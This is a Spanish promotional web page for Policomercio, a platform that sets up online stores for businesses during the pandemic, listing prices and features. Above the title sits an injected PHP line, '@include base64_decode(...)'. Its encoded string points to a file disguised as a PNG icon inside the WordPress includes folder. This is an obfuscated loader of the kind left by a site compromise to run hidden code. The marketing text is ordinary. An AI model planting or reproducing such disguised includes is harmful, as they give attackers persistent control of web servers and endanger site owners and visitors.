@include base64_decode("L2hvbWUvcG9saW1oYXQvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvaW1hZ2VzL3dwaWNvbnMtM3gucG5n"); Policomercio, la económica plataforma para tener en un día su tienda virtual - Policomercio

Ante la emergencia ocasionada por el coronavirus, se creó la plataforma Policomercio con un objetivo: ayudar a todos los negocios a trasladarse al mundo digital, comprendiendo que esto más allá de una ventaja competitiva, es una obligación para sobrevivir. 

¿Qué es Policomercio?

Es una plataforma que permite a las empresas y negocios empezar a vender por Internet en muy poco tiempo y con una muy baja inversión. Lo hacen a través de la creación de una tienda virtual con múltiples servicios para brindar una experiencia positiva que incremente las oportunidades de venta. 

¿Cuáles son los beneficios de tener una tienda virtual con Policomercio?

Implementar Policomercio tiene ventajas únicas que le permiten a los comercios apalancar su modelo de negocio en el mundo virtual. Estos son algunos de los beneficios:

  • Múltiples opciones de pago: Los clientes pueden pagar utilizando tarjetas crédito o débito desde Internet. También pueden pagar con efectivo en puntos Efecty, Baloto, Paga Todo y otros 8 negocios de este tipo.
  • Tienda virtual a bajo costo: Tener una tienda virtual puede ser muy costoso, sin embargo, con Policomercio es posible tener una desde $100.000 mensuales. 
  • Inmediatez: Es posible tener la tienda virtual en un día. 
  • Tienda personalizada: La tienda se crea con las características y necesidades de cada comercio. 
  • Facilidad de manejo: Es una plataforma muy sencilla e intuitiva de utilizar. También es posible contratar la administración total de la tienda.
  • Posicionamiento SEO: La tienda virtual incluye posicionamiento SEO, esto significa que será más fácil de encontrar en Internet.
  • Múltiples productos: Es posible subir hasta 100 productos con descripción, precio y fotos. 
  • Cotizaciones automáticas: Los clientes pueden descargar cotizaciones de los productos que deseen adquirir. 
  • Backup automático: Esto permite tener toda la información sobre los pedidos realizados y los clientes que han comprado. 
  • Botón para vender por WhatsApp: El cliente puede hacer clic en el icono de WhatsApp y ser llevado inmediatamente a la ventana de conversación con el comercio. 

Este servicio también incluye dominio y hosting, este último de por vida. Como puede ver, es una plataforma muy completa, económica y que puede tener hoy mismo desde $100.000. Una opción muy interesante y necesaria para hacer frente a la pandemia y prepararse para un mundo cada vez más digitalizado.